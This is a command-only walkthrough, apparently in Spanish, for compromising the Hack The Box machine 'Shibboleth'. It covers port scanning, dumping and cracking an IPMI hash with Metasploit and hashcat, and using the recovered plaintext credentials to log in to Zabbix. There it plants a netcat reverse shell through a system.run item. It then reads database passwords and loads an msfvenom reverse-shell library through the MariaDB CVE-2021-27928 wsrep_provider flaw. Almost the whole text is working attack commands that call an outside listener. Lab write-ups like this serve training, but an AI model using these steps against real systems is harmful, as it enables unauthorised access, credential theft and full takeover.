nmap -A -p- -oA shibboleth 10.129.188.117 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA shibboleth 10.129.188.117

nmap -sU -O -p- -oA shibboleth-udp 10.129.188.117

nikto -h 10.129.188.117:8500

gobuster vhost -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt" -u "shibboleth.htb" -r


Pasted image 20211128131144.png

msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts monitor.shibboleth.htb
run

Administrator:68f06f1e82010000b5ae67010aa2771364c8e73cd9baefa356ab685edbaf53a462ad2febc0822661a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e2c24922308e07c7fccde5dc8820b124b70fac61

hashcat -m 7300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o hash --potfile-disable -D 1 --force

Nos dirigimos a http://monitor.shibboleth.htb/ Usamos las credenciales Administrator : ilovepumkinpie1

Configuration-> Items

Pasted image 20211128131447.png

system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.65 443 >/tmp/f &,nowait]

nc -lvnp 443

Pasted image 20211128132320.png

Le damos click a Test y despues a Get value and test

Pasted image 20211128132725.png

python3 -c 'import pty; pty.spawn("/bin/bash")'

cat /etc/passwd

Pasted image 20211128133115.png

su ipmi-svc
ilovepumkinpie1

Pasted image 20211128133627.png

cat /etc/zabbix/zabbix_server.conf | grep DB

Pasted image 20211128133538.png

https://github.com/Al1ex/CVE-2021-27928

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f elf-so -o shell.so

Pasted image 20211128134905.png

nc -lvnp 4444

python3 -m http.server 80

wget http://10.10.x.x/shell.so

Pasted image 20211128135104.png

mysql -h localhost -D zabbix -u zabbix -p'bloooarskybluh'

SET GLOBAL wsrep_provider="/tmp/shell.so";

Pasted image 20211128135729.png

boxes

copyright©2022 Cu3rv0x all rights reserved